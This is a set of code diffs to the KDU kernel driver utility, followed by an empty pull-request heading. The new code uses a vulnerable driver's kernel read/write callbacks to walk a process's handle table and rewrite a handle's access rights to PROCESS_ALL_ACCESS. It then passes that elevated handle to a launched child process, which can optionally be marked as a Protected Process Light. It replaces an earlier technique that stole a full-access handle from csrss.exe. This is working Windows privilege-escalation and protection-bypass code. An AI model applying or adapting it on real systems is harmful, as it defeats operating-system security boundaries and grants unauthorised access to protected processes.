@@ -30,6 +30,15 @@ typedef BOOL(WINAPI* pfnMiniDumpWriteDump)(
     _In_opt_ PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam,
     _In_opt_ PMINIDUMP_CALLBACK_INFORMATION CallbackParam);
 
+BOOL KDUVerifyProviderCallbacksForOpenProcess(
+    _In_ PKDU_CONTEXT Context
+)
+{
+    if (Context->Provider->Callbacks.OpenProcess == NULL)
+        return FALSE;
+    return TRUE;
+}
+
 LPCSTR KDUGetProtectionTypeAsString(
     _In_ ULONG Type
 )
@@ -80,6 +89,11 @@ BOOL KDUDumpProcessMemory(
     HANDLE hFile = INVALID_HANDLE_VALUE;
     HANDLE processHandle = NULL;
     pfnMiniDumpWriteDump pMiniDumpWriteDump;
+
+	if (!KDUVerifyProviderCallbacksForOpenProcess(Context)) {
+		supPrintfEvent(kduEventError, "Provider does not support OpenProcess callback\r\n");
+		return FALSE;
+	}
 
     WCHAR szOutputName[MAX_PATH];
     PSYSTEM_PROCESS_INFORMATION procEntry = NULL;
@@ -327,6 +341,8 @@ BOOL KDUGetEprocessOffsets(
     Offsets->PsProtectionOffset = 0;
     Offsets->MitigationFlags1Offset = 0;
     Offsets->MitigationFlags2Offset = 0;
+    Offsets->ObjectHandleOffset = 0;
+	Offsets->HandleTableOffset = 0;
 
     switch (NtBuildNumber) {
 
@@ -389,6 +405,8 @@ BOOL KDUGetEprocessOffsets(
         Offsets->PsProtectionOffset = PsProtectionOffset_26100;
         Offsets->MitigationFlags1Offset = PsMitigationFlags1Offset_26100;
         Offsets->MitigationFlags2Offset = PsMitigationFlags2Offset_26100;
+		Offsets->ObjectHandleOffset = ObjectTableOffset_26100;
+		Offsets->HandleTableOffset = HandleTableOffset_26100;
         break;
 
     default:
@@ -686,6 +704,214 @@ BOOL KDUControlProcessMitigationFlags(
     return bResult1 && bResult2;
 }
 
+ULONG_PTR LookupHandleEntry(
+    _In_ PKDU_CONTEXT Context,
+    ULONG_PTR HandleTable,
+    HANDLE HandleValue,
+	KDU_EPROCESS_OFFSETS offsets
+)
+{
+    ULONG_PTR TableCode;
+    ULONG_PTR Level;
+    ULONG_PTR Base;
+    ULONG_PTR Index;
+
+	// get the redirection level and base address from the handle table
+    if (!Context->Provider->Callbacks.ReadKernelVM(Context->DeviceHandle,
+        HANDLE_TABLE_OFFSET(HandleTable, offsets.HandleTableOffset),
+        &TableCode,
+        sizeof(ULONG_PTR)))
+    {
+        return 0;
+    }
+
+    Level = TableCode & 3;
+    Base = TableCode & ~3;
+
+    Index = ((ULONG_PTR)HandleValue) >> 2;
+
+    switch (Level)
+    {
+    case 0:
+    {
+        return Base + (Index * sizeof(HANDLE_TABLE_ENTRY));
+    }
+
+    case 1:
+    {
+        ULONG_PTR Mid;
+
+        if (!Context->Provider->Callbacks.ReadKernelVM(
+            Context->DeviceHandle,
+            Base + ((Index >> 8) * sizeof(ULONG_PTR)),
+            &Mid,
+            sizeof(Mid))) {
+            return 0;
+        }
+
+        return Mid + ((Index & 0xFF) * sizeof(HANDLE_TABLE_ENTRY));
+    }
+
+    case 2:
+    {
+        ULONG_PTR L1;
+        ULONG_PTR L2;
+
+        if (!Context->Provider->Callbacks.ReadKernelVM(
+            Context->DeviceHandle,
+            Base + ((Index >> 16) * sizeof(ULONG_PTR)),
+            &L1,
+            sizeof(L1)))
+        {
+            return 0;
+        }
+
+        if (!Context->Provider->Callbacks.ReadKernelVM(
+            Context->DeviceHandle,
+            L1 + (((Index >> 8) & 0xFF) * sizeof(ULONG_PTR)),
+            &L2,
+            sizeof(L2)))
+        {
+            return 0;
+        }
+
+        return L2 + ((Index & 0xFF) * sizeof(HANDLE_TABLE_ENTRY));
+    }
+    }
+
+    return 0;
+}
+
+/*
+* 
+* KDUControlHandleAccess
+* 
+* Purpose:
+* 
+* Modify an existing handle's access rights
+*/
+BOOL KDUControlHandleAccess(
+    _In_ PKDU_CONTEXT Context,
+    _In_ ULONG_PTR ProcessId,
+    _In_ HANDLE HandleValue,
+    _In_ ACCESS_MASK NewAccessMask)
+{
+	BOOL       bResult = FALSE;
+	NTSTATUS   ntStatus;
+	ULONG_PTR  ProcessObject = 0, HandleTable = 0, HandleEntry = 0;
+	HANDLE     hProcess = NULL;
+	CLIENT_ID clientId;
+	OBJECT_ATTRIBUTES obja;
+	KDU_EPROCESS_OFFSETS offsets;
+	
+    if (!KDUVerifyProviderCallbacksForPsPatch(Context)) {
+		printf_s("[!] Provider does not support required callbacks for handle access control\r\n");
+        return FALSE;
+    }
+
+    if (!KDUGetEprocessOffsets(Context->NtBuildNumber, &offsets) ||
+        offsets.ObjectHandleOffset == 0)
+    {
+        supPrintfEvent(kduEventError, 
+            "[!] Unsupported WinNT version\r\n");
+        return FALSE;
+    }
+
+	FUNCTION_ENTER_MSG(__FUNCTION__);
+	InitializeObjectAttributes(&obja, NULL, 0, 0, 0);
+	clientId.UniqueProcess = (HANDLE)ProcessId;
+	clientId.UniqueThread = NULL;
+	
+    ntStatus = NtOpenProcess(&hProcess, PROCESS_QUERY_LIMITED_INFORMATION,
+		&obja, &clientId);
+	
+    if (NT_SUCCESS(ntStatus)) {
+		printf_s("[+] Process with PID %llu opened (PROCESS_QUERY_LIMITED_INFORMATION)\r\n", ProcessId);
+		bResult = supQueryObjectFromHandle(hProcess, &ProcessObject);
+		
+        if (bResult && (ProcessObject != 0)) {
+			printf_s("[+] Process object (EPROCESS) found, 0x%llX\r\n", ProcessObject);
+			
+            // read the ObjectTable pointer from the EPROCESS structure
+			if (Context->Provider->Callbacks.ReadKernelVM(Context->DeviceHandle,
+				EPROCESS_TO_OBJECTTABLE(ProcessObject, offsets.ObjectHandleOffset),
+				&HandleTable,
+				sizeof(ULONG_PTR))) 
+            {
+				printf_s("[+] ObjectTable pointer read: 0x%llX\r\n", HandleTable);
+
+                // parse the layer type
+				HandleEntry = LookupHandleEntry(Context, HandleTable, HandleValue, offsets);
+				if (HandleEntry != 0) {
+				    printf_s("[+] HandleEntry pointer read: 0x%llX\r\n", HandleEntry);
+
+				    // read the current access rights from the HandleTableEntry
+				    HANDLE_TABLE_ENTRY entry = { 0 };
+                    if (Context->Provider->Callbacks.ReadKernelVM(Context->DeviceHandle,
+                        HandleEntry,
+                        &entry,
+                        sizeof(entry)))
+                    {
+                        printf_s("[+] Current Handle access rights: 0x%lX\r\n", entry.GrantedAccess);
+
+                        // modify the access rights
+                        bResult = Context->Provider->Callbacks.WriteKernelVM(
+                            Context->DeviceHandle,
+                            HandleEntry + offsetof(HANDLE_TABLE_ENTRY, GrantedAccess),
+                            &NewAccessMask,
+                            sizeof(ULONG)
+                        );
+
+                        if (bResult) { // and verify
+                            printf_s("[+] Handle access rights modified successfully.\r\n");
+                            if (Context->Provider->Callbacks.ReadKernelVM(Context->DeviceHandle,
+                                HandleEntry,
+                                &entry,
+                                sizeof(entry)))
+                            {
+                                if ((entry.GrantedAccess & NewAccessMask) == NewAccessMask) {
+                                    printf_s("[+] Verified: Handle access rights updated to 0x%lX.\r\n", entry.GrantedAccess);
+                                }
+                                else {
+                                    printf_s("[!] Verification failed: Handle access rights are 0x%lX, expected 0x%lX.\r\n", entry.GrantedAccess, NewAccessMask);
+                                }
+                            }
+                            else {
+                                printf("[!] Failed to read back HandleTableEntry after modification.\r\n");
+                            }
+                        }
+                        else {
+                            supPrintfEvent(kduEventError, "[!] Failed to modify handle access rights\r\n");
+                        }
+                    }
+                    else {
+						supPrintfEvent(kduEventError, "[!] Cannot read HandleTableEntry\r\n");
+                    }
+				}
+				else {
+					supPrintfEvent(kduEventError, "[!] Cannot read HandleTableEntry\r\n");
+				}
+			}
+			else {
+				supPrintfEvent(kduEventError,
+					"[!] Cannot read ObjectTable pointer\r\n");
+			}
+		}
+		else {
+			supPrintfEvent(kduEventError,
+				"[!] Cannot query process object\r\n");
+		}
+		NtClose(hProcess);
+	}
+	else {
+		supShowHardError("[!] Cannot open target process", ntStatus);
+	}
+
+	FUNCTION_LEAVE_MSG(__FUNCTION__);
+
+	return bResult;
+}
+
 /*
 * KDURunCommandDup
 *
@@ -698,32 +924,70 @@ BOOL KDURunCommandDup(
     _In_ PKDU_CONTEXT Context,
     _In_ LPWSTR CommandLine,
     _In_ ULONG_PTR TargetProcessId,
-    _Out_ HANDLE dupHandle)
+    _Out_ HANDLE *dupHandle)
 {
-    BOOL       bResult = FALSE;
-    DWORD      dwThreadResumeCount = 0;
-    dupHandle = { 0 };
+    BOOL   bResult = FALSE;
+	dupHandle = NULL;
 
-    // find csrss.exe with tlhelp and store as SourceProcessId
-    ULONG_PTR SourceProcessId = 0;
-    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
-    if (hSnapshot == INVALID_HANDLE_VALUE) {
-        supShowWin32Error("[!] Failed to create process snapshot", GetLastError());
-        return FALSE;
-    }
-    PROCESSENTRY32 pe;
-    pe.dwSize = sizeof(PROCESSENTRY32);
-    if (Process32First(hSnapshot, &pe)) {
-        do {
-            if (_wcsicmp(pe.szExeFile, L"csrss.exe") == 0) {
-                SourceProcessId = pe.th32ProcessID;
-                break;
+	if (!KDUVerifyProviderCallbacksForOpenProcess(Context)) {
+		printf_s("[!] Provider does not support required callbacks for handle duplication\r\n");
+		return FALSE;
+	}
+
+    HANDLE hTargetProc;
+    if (KDUOpenProcess(Context, (HANDLE)TargetProcessId, PROCESS_ALL_ACCESS, &hTargetProc)) {
+        DWORD flags = 0;
+
+		printf_s("[+] Opened target process with PID %llu\r\n", TargetProcessId);
+        if (GetHandleInformation(hTargetProc, &flags)) {
+            if (flags & HANDLE_FLAG_INHERIT) {
+                printf("[+] Success: The handle %p is inheritable.\n", hTargetProc);
             }
-        } while (Process32Next(hSnapshot, &pe));
+            else {
+                printf("[-] Warning: The handle %p is not inheritable, attempting to set inheritance flag...\n", hTargetProc);
+                if (!SetHandleInformation(hTargetProc, HANDLE_FLAG_INHERIT, HANDLE_FLAG_INHERIT)) {
+                    printf("[!] Failed to set inheritance flag. Error: %lu\n", GetLastError());
+                    return FALSE;
+                }
+                else {
+                    printf("[+] Successfully toggled HANDLE_FLAG_INHERIT on the handle %p.\n", hTargetProc);
+                }
+            }
+        }
+        else {
+            printf("[!] GetHandleInformation failed. Error: %lu\n", GetLastError());
+        }
     }
-    CloseHandle(hSnapshot);
-    if (SourceProcessId == 0) {
-        printf_s("[!] Failed to find csrss.exe process\n");
+    else {
+		printf("[!] Failed to open target process with PID %llu.", TargetProcessId);
+		return FALSE;
+    }
+
+    // check if handle has PROCESS_FULL_ACCESS rights
+    unsigned char buf[sizeof(OBJECT_BASIC_INFORMATION)] = {};
+    ULONG returnLength;
+
+    NTSTATUS status = NtQueryObject(hTargetProc, ObjectBasicInformation, buf, sizeof(buf), &returnLength);
+    if (status == STATUS_SUCCESS) { 
+        POBJECT_BASIC_INFORMATION pBasicInfo = (POBJECT_BASIC_INFORMATION)buf;
+		if ((pBasicInfo->GrantedAccess & PROCESS_ALL_ACCESS) == PROCESS_ALL_ACCESS) {
+			printf("[+] The handle %p has PROCESS_ALL_ACCESS rights to the target process.\n", hTargetProc);
+		}
+		else {
+			printf("[-] Warning: Handle %p only has access rights: 0x%lX. Attempting to modify...\n", hTargetProc, pBasicInfo->GrantedAccess);
+			
+            // attempt to modify the handle's access rights using KDUControlHandleAccess
+			if (KDUControlHandleAccess(Context, GetCurrentProcessId(), hTargetProc, PROCESS_ALL_ACCESS)) {
+				printf("[+] Success: Modified the KDU handle's access rights to PROCESS_ALL_ACCESS.\n");
+			}
+			else {
+				printf("[!] Failed to modify the KDU handle's access rights.\n");
+				return FALSE;
+			}
+		}
+    }
+    else {
+        printf("[!] Failed to query handle information with status: 0x%lX\n", status);
         return FALSE;
     }
 
@@ -736,14 +1000,14 @@ BOOL KDURunCommandDup(
 
     wprintf_s(L"[+] Creating Process '%s'\r\n", CommandLine);
 
+    // process can be started directly, 
     bResult = CreateProcess(
         NULL,               // No module name (use command line)
         CommandLine,        // Command line
         NULL,               // Process handle not inheritable
         NULL,               // Thread handle not inheritable
-        FALSE,              // Set handle inheritance to FALSE
-        CREATE_SUSPENDED,   // Create Process suspended so we can edit
-        // its protection level prior to starting
+        TRUE,               // Do inherit inheritable handles
+		NULL,               // Create Process running normally
         NULL,               // Use parent's environment block
         NULL,               // Use parent's starting directory 
         &si,                // Pointer to STARTUPINFO structure
@@ -754,18 +1018,6 @@ BOOL KDURunCommandDup(
     }
     printf_s("[+] Created Process with PID %lu\r\n", pi.dwProcessId);
 
-    bResult = KDUDuplicateProcessHandle(Context, pi.hProcess, SourceProcessId, TargetProcessId, &dupHandle);
-    if (!bResult) {
-        supShowWin32Error("[!] Failed to duplicate handle", GetLastError());
-        return bResult;
-    }
-
-    dwThreadResumeCount = ResumeThread(pi.hThread);
-    if (dwThreadResumeCount != 1) {
-        printf_s("[!] Failed to resume process: %lu | 0x%lX\n", dwThreadResumeCount, GetLastError());
-        return bResult;
-    }
-
     // Wait until child process exits.
     WaitForSingleObject(pi.hProcess, INFINITE);
 
@@ -773,167 +1025,5 @@ BOOL KDURunCommandDup(
     CloseHandle(pi.hProcess);
     CloseHandle(pi.hThread);
 
-    return bResult;
-}
-
-// Helper function to find a handle with PROCESS_ALL_ACCESS rights to TargetPid in SourcePid process and return it for duplication
-HANDLE FindProcessHandle(ULONG_PTR sourcePid, HANDLE hTargetProcess, ULONG_PTR targetPid) {
-    printf_s("[*] Searching for a handle with PROCESS_ALL_ACCESS to target process %llu in source process %llu\r\n", targetPid, sourcePid);
-
-    ULONG bufferSize = 0x4000; // Start with a 16KB buffer
-    PVOID buffer = ntsupVirtualAlloc((SIZE_T)bufferSize);
-    if (!buffer) return NULL;
-
-    NTSTATUS ntStatus = NtQuerySystemInformation(
-        (SYSTEM_INFORMATION_CLASS)SystemHandleInformation,
-        buffer,
-        bufferSize,
-        &bufferSize
-    );
-
-    // Reallocate if the process contains more handles than expected
-    if (ntStatus == STATUS_INFO_LENGTH_MISMATCH) {
-        ntsupVirtualFree(buffer);
-
-        buffer = ntsupVirtualAlloc((SIZE_T)bufferSize);
-        if (!buffer) {
-            printf_s("[!] Failed to allocate buffer for handle information\r\n");
-            return NULL;
-        }
-
-        ntStatus = NtQuerySystemInformation(
-            (SYSTEM_INFORMATION_CLASS)SystemHandleInformation,
-            buffer,
-            bufferSize,
-            &bufferSize
-        );
-    }
-
-    if (!NT_SUCCESS(ntStatus)) {
-        if (buffer) ntsupVirtualFree(buffer);
-        printf_s("[!] Failed to query process handle information from source process\r\n");
-        return NULL;
-    }
-
-    printf_s("[*] Source process has %llu handles\r\n", ((PPROCESS_HANDLE_SNAPSHOT_INFORMATION)buffer)->NumberOfHandles);
-
-    HANDLE hFoundHandle = NULL;
-    PSYSTEM_HANDLE_INFORMATION handleInfo = (PSYSTEM_HANDLE_INFORMATION)buffer;
-    PVOID targetEprocessAddress = NULL;
-    ULONG_PTR currentPid = GetCurrentProcessId();
-
-    // Resolve Target Process' kernel EPROCESS address by looking up kdu.exe's open handle
-    for (ULONG i = 0; i < handleInfo->NumberOfHandles; i++) {
-        SYSTEM_HANDLE_TABLE_ENTRY_INFO entry = handleInfo->Handles[i];
-
-        if (entry.UniqueProcessId == currentPid) {
-
-            // Match the handle value that KDUOpenProcess gave us for the target
-            if ((HANDLE)(ULONG_PTR)entry.HandleValue == hTargetProcess) {
-                targetEprocessAddress = entry.Object;
-                break;
-            }
-        }
-    }
-    if (targetEprocessAddress == NULL) {
-        printf_s("[!] Failed to resolve target process EPROCESS kernel pointer\r\n");
-        ntsupVirtualFree(buffer);
-        return NULL;
-    }
-
-    printf_s("[*] Resolved target process EPROCESS kernel pointer: 0x%p\n", targetEprocessAddress);
-
-    // Find the handle inside Source Process (csrss.exe) pointing to that kernel address
-    for (ULONG i = 0; i < handleInfo->NumberOfHandles; i++) {
-        SYSTEM_HANDLE_TABLE_ENTRY_INFO entry = handleInfo->Handles[i];
-
-        if (entry.UniqueProcessId == sourcePid) { // must be owned by the source process (csrss.exe)
-
-            if (entry.Object == targetEprocessAddress) { // must point to the target process EPROCESS in kernel
-
-                if ((entry.GrantedAccess & PROCESS_ALL_ACCESS) == PROCESS_ALL_ACCESS) {
-
-                    hFoundHandle = (HANDLE)(ULONG_PTR)entry.HandleValue;
-                    printf_s("[+] Found valid handle value! Handle: 0x%p (Access: 0x%lX)\n",
-                        hFoundHandle, entry.GrantedAccess);
-                    break;
-                }
-            }
-        }
-    }
-
-    ntsupVirtualFree(buffer);
-    return hFoundHandle;
-}
-
-/*
-* KDUDuplicateProcessHandle
-*
-* Purpose:
-*
-* Duplicates a process handle with PROCESS_ALL_ACCESS rights to our new process.
-*
-*/
-BOOL KDUDuplicateProcessHandle(
-    _In_ PKDU_CONTEXT Context,
-    _In_ HANDLE hNewProcess,
-    _In_ ULONG_PTR SourceProcessId,
-    _In_ ULONG_PTR TargetProcessId,
-    _Out_ PHANDLE DupHandle
-)
-{
-    BOOL bResult = FALSE;
-    HANDLE hSourceProcess = NULL, hTargetProcess = NULL;
-
-    FUNCTION_ENTER_MSG(__FUNCTION__);
-
-    bResult = KDUOpenProcess(Context, (HANDLE)SourceProcessId, PROCESS_DUP_HANDLE, &hSourceProcess);
-    if (bResult && hSourceProcess != NULL) {
-        printf_s("[+] Process with PID %llu opened (PROCESS_DUP_HANDLE)\r\n", SourceProcessId);
-
-        bResult = KDUOpenProcess(Context, (HANDLE)TargetProcessId, PROCESS_DUP_HANDLE, &hTargetProcess);
-        if (bResult && hTargetProcess != NULL) {
-            printf_s("[+] Process with PID %llu opened (PROCESS_DUP_HANDLE)\r\n", TargetProcessId);
-
-            // search for the handle in sourceProcess with PROCESS_ALL_ACCESS on targetProcess, to duplicate into the newProcess
-            HANDLE hSourceProcessHandleToDup = FindProcessHandle(SourceProcessId, hTargetProcess, TargetProcessId);
-            if (hSourceProcessHandleToDup != NULL) {
-
-                bResult = NtDuplicateObject(hSourceProcess,
-                    hSourceProcessHandleToDup,
-                    hNewProcess,
-                    DupHandle,
-                    PROCESS_ALL_ACCESS,
-                    TRUE,      // OBJ_INHERIT (for the new process to use)
-                    DUPLICATE_SAME_ACCESS
-                );
-                if (bResult) {
-                    printf_s("[+] Duplicated process handle to new process\r\n");
-                }
-                else {
-                    supShowHardError("[!] Failed to duplicate process handle", bResult);
-                    bResult = FALSE;
-                }
-                NtClose(hTargetProcess);
-            }
-            else {
-                printf_s("[!] Failed to find a handle with PROCESS_ALL_ACCESS to target process %llu in source process %llu\n", TargetProcessId, SourceProcessId);
-                bResult = FALSE;
-            }
-        }
-        else {
-            supShowHardError("[!] Cannot open target process", bResult);
-        }
-        NtClose(hSourceProcess);
-    }
-    else {
-        supShowHardError("[!] Cannot open source process", bResult);
-    }
-    FUNCTION_LEAVE_MSG(__FUNCTION__);
-
-    if (!bResult) {
-        printf_s("[!] Handle duplication failed. Check if the source process has a handle with PROCESS_ALL_ACCESS to the target process.\n");
-        *DupHandle = NULL;
-    }
     return bResult;
 }

--- a/Source/Hamakaze/ps.cpp
+++ b/Source/Hamakaze/ps.cpp
@@ -341,8 +341,8 @@ BOOL KDUGetEprocessOffsets(
     Offsets->PsProtectionOffset = 0;
     Offsets->MitigationFlags1Offset = 0;
     Offsets->MitigationFlags2Offset = 0;
-    Offsets->ObjectHandleOffset = 0;
-	Offsets->HandleTableOffset = 0;
+    Offsets->ObjectTableOffset = 0;
+	Offsets->HandleTableOffset = HandleTableOffset_all;
 
     switch (NtBuildNumber) {
 
@@ -398,6 +398,7 @@ BOOL KDUGetEprocessOffsets(
         Offsets->PsProtectionOffset = PsProtectionOffset_19041;
         Offsets->MitigationFlags1Offset = PsMitigationFlags1Offset_19041;
         Offsets->MitigationFlags2Offset = PsMitigationFlags2Offset_19041;
+        Offsets->ObjectTableOffset = ObjectTableOffset_19041;
         break;
 
     case NT_WIN11_24H2:
@@ -405,8 +406,7 @@ BOOL KDUGetEprocessOffsets(
         Offsets->PsProtectionOffset = PsProtectionOffset_26100;
         Offsets->MitigationFlags1Offset = PsMitigationFlags1Offset_26100;
         Offsets->MitigationFlags2Offset = PsMitigationFlags2Offset_26100;
-		Offsets->ObjectHandleOffset = ObjectTableOffset_26100;
-		Offsets->HandleTableOffset = HandleTableOffset_26100;
+		Offsets->ObjectTableOffset = ObjectTableOffset_26100;
         break;
 
     default:
@@ -810,7 +810,7 @@ BOOL KDUControlHandleAccess(
     }
 
     if (!KDUGetEprocessOffsets(Context->NtBuildNumber, &offsets) ||
-        offsets.ObjectHandleOffset == 0)
+        offsets.ObjectTableOffset == 0)
     {
         supPrintfEvent(kduEventError, 
             "[!] Unsupported WinNT version\r\n");
@@ -834,7 +834,7 @@ BOOL KDUControlHandleAccess(
 			
             // read the ObjectTable pointer from the EPROCESS structure
 			if (Context->Provider->Callbacks.ReadKernelVM(Context->DeviceHandle,
-				EPROCESS_TO_OBJECTTABLE(ProcessObject, offsets.ObjectHandleOffset),
+				EPROCESS_TO_OBJECTTABLE(ProcessObject, offsets.ObjectTableOffset),
 				&HandleTable,
 				sizeof(ULONG_PTR))) 
             {

--- a/Source/Hamakaze/ps.cpp
+++ b/Source/Hamakaze/ps.cpp
@@ -19,7 +19,6 @@
 
 #include "global.h"
 #include <Dbghelp.h>
-#include <TlHelp32.h>
 
 typedef BOOL(WINAPI* pfnMiniDumpWriteDump)(
     _In_ HANDLE hProcess,

--- a/Source/Hamakaze/ps.cpp
+++ b/Source/Hamakaze/ps.cpp
@@ -920,14 +920,12 @@ BOOL KDUControlHandleAccess(
 * Start a Process to duplicate a handle into
 *
 */
-BOOL KDURunCommandDup(
+BOOL KDURunCommandInheritee(
     _In_ PKDU_CONTEXT Context,
     _In_ LPWSTR CommandLine,
     _In_ ULONG_PTR TargetProcessId,
-    _Out_ HANDLE *dupHandle)
+    _In_ ULONG_PTR PPLLevel)
 {
-    BOOL   bResult = FALSE;
-	dupHandle = NULL;
 
 	if (!KDUVerifyProviderCallbacksForOpenProcess(Context)) {
 		printf_s("[!] Provider does not support required callbacks for handle duplication\r\n");
@@ -998,25 +996,59 @@ BOOL KDURunCommandDup(
     si.cb = sizeof(si);
     ZeroMemory(&pi, sizeof(pi));
 
-    wprintf_s(L"[+] Creating Process '%s'\r\n", CommandLine);
+    DWORD creationOptions;
+    if (PPLLevel > 0) {
+        wprintf_s(L"[+] Creating suspended Process '%s'\r\n", CommandLine);
+        creationOptions = CREATE_SUSPENDED;
+    }
+    else {
+        wprintf_s(L"[+] Creating Process '%s'\r\n", CommandLine);
+        creationOptions = NULL;
+    }
+
 
     // process can be started directly, 
-    bResult = CreateProcess(
+    if (!CreateProcess(
         NULL,               // No module name (use command line)
         CommandLine,        // Command line
         NULL,               // Process handle not inheritable
         NULL,               // Thread handle not inheritable
         TRUE,               // Do inherit inheritable handles
-		NULL,               // Create Process running normally
+        creationOptions,
         NULL,               // Use parent's environment block
         NULL,               // Use parent's starting directory 
         &si,                // Pointer to STARTUPINFO structure
-        &pi);               // Pointer to PROCESS_INFORMATION structure
-    if (!bResult) {
+        &pi))               // Pointer to PROCESS_INFORMATION structure
+    {
         supShowWin32Error("[!] Failed to create process", GetLastError());
-        return bResult;
+        return FALSE;
     }
     printf_s("[+] Created Process with PID %lu\r\n", pi.dwProcessId);
+
+    // when suspended, patch PPL and resume
+    if (PPLLevel > 0 and PPLLevel < 8) {
+
+        DWORD dwThreadResumeCount = 0;
+        PS_PROTECTED_SIGNER signer = (PS_PROTECTED_SIGNER)PPLLevel;
+        PS_PROTECTED_TYPE type = PsProtectedTypeProtectedLight;
+
+        if (!KDUControlProcessProtections(Context, pi.dwProcessId, signer, type)) {
+            supShowWin32Error("[!] Failed to set process as PPL", GetLastError());
+            TerminateProcess(pi.hProcess, 0);
+            CloseHandle(pi.hProcess);
+            CloseHandle(pi.hThread);
+            return FALSE;
+        }
+
+        dwThreadResumeCount = ResumeThread(pi.hThread);
+        if (dwThreadResumeCount != 1) {
+            printf_s("[!] Failed to resume process: %lu | 0x%lX\n", dwThreadResumeCount, GetLastError());
+            TerminateProcess(pi.hProcess, 0);
+            CloseHandle(pi.hProcess);
+            CloseHandle(pi.hThread);
+            return FALSE;
+        }
+    }
 
     // Wait until child process exits.
     WaitForSingleObject(pi.hProcess, INFINITE);
@@ -1025,5 +1057,5 @@ BOOL KDURunCommandDup(
     CloseHandle(pi.hProcess);
     CloseHandle(pi.hThread);
 
-    return bResult;
+    return TRUE;
 }

--- a/Source/Hamakaze/ps.h
+++ b/Source/Hamakaze/ps.h
@@ -52,8 +52,12 @@
 #define PS_MITIGATION_FLAGS1 0x00000001
 #define PS_MITIGATION_FLAGS2 0x00000002
 
-#define ObjectTableOffset_26100 0x300
-#define HandleTableOffset_26100 0x8
+// credits to https://www.vergiliusproject.com/kernels/x64/windows-11/25h2/_EPROCESS
+#define ObjectTableOffset_19041 0x570 // 2004, 20H2, ..., 23H2
+#define ObjectTableOffset_26100 0x300 // 24H2, 25H2
+
+// credits to https://www.vergiliusproject.com/kernels/x64/windows-11/25h2/_HANDLE_TABLE_ENTRY
+#define HandleTableOffset_all 0x8 // XP..25H2
 
 #define EPROCESS_TO_PROTECTION(Object, Offset) ((ULONG_PTR)(Object) + (Offset))
 #define EPROCESS_TO_MITIGATIONFLAGS(Object, FlagsOffset) ((ULONG_PTR)(Object) + (FlagsOffset))
@@ -65,7 +69,7 @@ typedef struct _KDU_EPROCESS_OFFSETS {
     ULONG_PTR PsProtectionOffset;
     ULONG_PTR MitigationFlags1Offset;
     ULONG_PTR MitigationFlags2Offset;
-    ULONG_PTR ObjectHandleOffset;
+    ULONG_PTR ObjectTableOffset;
     ULONG_PTR HandleTableOffset;
 } KDU_EPROCESS_OFFSETS, * PKDU_EPROCESS_OFFSETS;
 

--- a/Source/Hamakaze/ps.h
+++ b/Source/Hamakaze/ps.h
@@ -95,3 +95,16 @@ BOOL KDUControlProcessMitigationFlags(
     _In_ ULONG_PTR ProcessId,
     _In_ ULONG PsMitigations,
     _In_ INT TargetedFlags);
+
+BOOL KDURunCommandDup(
+    _In_ PKDU_CONTEXT Context,
+    _In_ LPWSTR CommandLine,
+    _In_ ULONG_PTR TargetProcessId,
+    _Out_ HANDLE dupHandle);
+
+BOOL KDUDuplicateProcessHandle(
+    _In_ PKDU_CONTEXT Context,
+    _In_ HANDLE NewProcessId,
+    _In_ ULONG_PTR SourceProcessId,
+    _In_ ULONG_PTR TargetProcessId,
+    _Out_ PHANDLE DupHandle);

--- a/Source/Hamakaze/ps.h
+++ b/Source/Hamakaze/ps.h
@@ -52,13 +52,21 @@
 #define PS_MITIGATION_FLAGS1 0x00000001
 #define PS_MITIGATION_FLAGS2 0x00000002
 
+#define ObjectTableOffset_26100 0x300
+#define HandleTableOffset_26100 0x8
+
 #define EPROCESS_TO_PROTECTION(Object, Offset) ((ULONG_PTR)(Object) + (Offset))
 #define EPROCESS_TO_MITIGATIONFLAGS(Object, FlagsOffset) ((ULONG_PTR)(Object) + (FlagsOffset))
+
+#define EPROCESS_TO_OBJECTTABLE(Object, Offset) ((ULONG_PTR)(Object) + (Offset))
+#define HANDLE_TABLE_OFFSET(Object, Offset) ((ULONG_PTR)(Object) + (Offset))
 
 typedef struct _KDU_EPROCESS_OFFSETS {
     ULONG_PTR PsProtectionOffset;
     ULONG_PTR MitigationFlags1Offset;
     ULONG_PTR MitigationFlags2Offset;
+    ULONG_PTR ObjectHandleOffset;
+    ULONG_PTR HandleTableOffset;
 } KDU_EPROCESS_OFFSETS, * PKDU_EPROCESS_OFFSETS;
 
 BOOL KDUGetEprocessOffsets(
@@ -100,11 +108,4 @@ BOOL KDURunCommandDup(
     _In_ PKDU_CONTEXT Context,
     _In_ LPWSTR CommandLine,
     _In_ ULONG_PTR TargetProcessId,
-    _Out_ HANDLE dupHandle);
-
-BOOL KDUDuplicateProcessHandle(
-    _In_ PKDU_CONTEXT Context,
-    _In_ HANDLE NewProcessId,
-    _In_ ULONG_PTR SourceProcessId,
-    _In_ ULONG_PTR TargetProcessId,
-    _Out_ PHANDLE DupHandle);
+    _Out_ HANDLE *dupHandle);

--- a/Source/Hamakaze/ps.h
+++ b/Source/Hamakaze/ps.h
@@ -104,8 +104,8 @@ BOOL KDUControlProcessMitigationFlags(
     _In_ ULONG PsMitigations,
     _In_ INT TargetedFlags);
 
-BOOL KDURunCommandDup(
+BOOL KDURunCommandInheritee(
     _In_ PKDU_CONTEXT Context,
     _In_ LPWSTR CommandLine,
     _In_ ULONG_PTR TargetProcessId,
-    _Out_ HANDLE *dupHandle);
+    _In_ ULONG_PTR PPLLevel);

--- a/Source/Shared/ntos/ntos.h
+++ b/Source/Shared/ntos/ntos.h
@@ -1280,6 +1280,23 @@ typedef struct _PROCESS_HANDLE_TABLE_ENTRY_INFO {
     ULONG Reserved;
 } PROCESS_HANDLE_TABLE_ENTRY_INFO, *PPROCESS_HANDLE_TABLE_ENTRY_INFO;
 
+typedef struct _HANDLE_TABLE_ENTRY {
+    union {
+        VOID* Object;                    // Pointer to the object (e.g., _EPROCESS)
+        ULONG_PTR ObAttributes;          // Low bits contain object flags/attributes
+        ULONGLONG Value;                 // Whole 64-bit value representing the object info
+    };
+    union {
+        ULONG GrantedAccess;             // access mask
+        struct {
+            USHORT GrantedAccessBits : 16;
+            USHORT NoCPUCount : 1;
+            USHORT CheckedTransfer : 1;
+        };
+        LONG NextFreeHandleEntry;        // Used if the handle slot is closed/free
+    };
+} HANDLE_TABLE_ENTRY, *PHANDLE_TABLE_ENTRY;
+
 typedef struct _PROCESS_HANDLE_SNAPSHOT_INFORMATION {
     ULONG_PTR NumberOfHandles;
     ULONG_PTR Reserved;


### PR DESCRIPTION
# What
